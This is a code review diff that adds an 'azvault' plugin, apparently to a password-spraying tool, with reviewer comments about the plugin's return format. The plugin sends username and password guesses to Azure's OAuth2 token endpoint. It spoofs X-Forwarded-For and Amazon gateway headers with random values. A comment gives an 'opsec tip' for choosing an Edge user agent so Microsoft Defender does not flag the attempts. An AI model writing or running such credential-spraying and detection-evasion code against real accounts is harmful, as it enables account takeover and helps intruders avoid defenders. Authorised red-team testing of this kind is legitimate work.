plugins/azvault/azvault.py

```diff
@@ -0,0 +1,120 @@
+import datetime, requests
+import utils.utils as utils
+
+def azvault_authenticate(url, username, password,  useragent, pluginargs):
+
+    ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
+
+    data_response = {
+        'timestamp': ts,
+        'username': username,
+        'password': password,
+        'success': False,
+        'change': False,
+        '2fa_enabled': False,
+        'type': None,
+        'code': None,
+        'name': None,
+        'action': None,
+        'headers': [],
+        'cookies': [],
+		'sourceip' : None,
+        'throttled' : False,
+		'error' : False,
+        'output' : ""
+    }
+
+    body = {
+        'resource': 'https://vault.azure.net',
+        'client_id': '1b730954-1685-4b74-9bfd-dac224a7b894',
+        'client_info': '1',
+        'grant_type': 'password',
+        'username': username,
+        'password': password,
+        'scope': 'openid',
+    }
+
+    spoofed_ip = utils.generate_ip()
+    amazon_id = utils.generate_id()
+    trace_id = utils.generate_trace_id()
+
+    headers = {
+        "X-My-X-Forwarded-For" : spoofed_ip,
+        "x-amzn-apigateway-api-id" : amazon_id,
+        "X-My-X-Amzn-Trace-Id" : trace_id,
+        # Opsec tip: UA must be edge otherwise Defender for cloud will flag it!
+        "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50",
+
+        'Accept': 'application/json',
+        'Content-Type': 'application/x-www-form-urlencoded'
+    }
+
+    headers = utils.add_custom_headers(pluginargs, headers)
+
+    try:
+        resp = requests.post("{}/common/oauth2/token".format(url), headers=headers, data=body)
+        data_response['code'] = resp.status_code
+
+        if resp.status_code == 200:
+            data_response['success'] = True
```

Comment:
change to current plugin style.
data_response['result'] = "success" is the new return (both "result" dict key, and "success" as a string)
Remove coloration from output response, that will be handled outside of plugins themselves

Reply:
Remove slack notify functions as well, that will be handled outside of plugin

Reply:
Apply these to all the responses below